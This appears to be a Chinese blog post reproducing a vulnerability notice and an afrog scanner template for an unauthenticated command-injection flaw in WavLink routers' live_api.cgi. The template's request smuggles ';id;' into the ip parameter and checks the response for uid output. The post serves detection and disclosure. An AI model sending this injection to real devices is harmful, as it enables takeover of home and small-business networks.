WavLink Router Live API cgi RCE

漏洞信息

漏洞名称: WavLink Router Live API cgi RCE

漏洞类型: 命令执行

漏洞等级: 高危

漏洞描述: WavLink路由器是一款常见的网络设备,广泛应用于家庭和小型企业网络中,提供网络连接和管理功能。该设备的Live API cgi接口存在命令执行漏洞,攻击者可以通过构造特定的HTTP请求,在无需认证的情况下远程执行任意命令。漏洞的根源在于对用户输入的验证不足,攻击者可以通过在请求中注入命令来利用此漏洞。这种漏洞的存在可能导致攻击者完全控制受影响的设备,进而可能进行数据泄露、服务中断或其他恶意活动。由于该漏洞可以被远程利用且无需用户交互,因此其安全风险较高。

产品厂商: WavLink

产品名称: WavLink Router

来源: https://github.com/zan8in/afrog/blob/b9686a5c4553da942d9b8736d91cd87b6ee026b1/pocs%2Fafrog-pocs%2Fvulnerability%2Fwavlink-router-live-api-cgi-rce.yaml

类型: zan8in/afrog:github commit

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

id: wavlink-router-live-api-cgi-rce

info:
name: WavLink Router Live API cgi RCE
author: 熊猫也是猫
severity: high
verified: true
tags: wavlink,rce
created: 2023/12/28

rules:
r0:
request:
method: GET
path: /cgi-bin/live_api.cgi?page=abc&id=173&ip=;id;
expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0()



WavLink Router Live API cgi RCE
http://example.com/2025/07/25/github_3656884969/
作者
lianccc
发布于
2025年7月25日
许可协议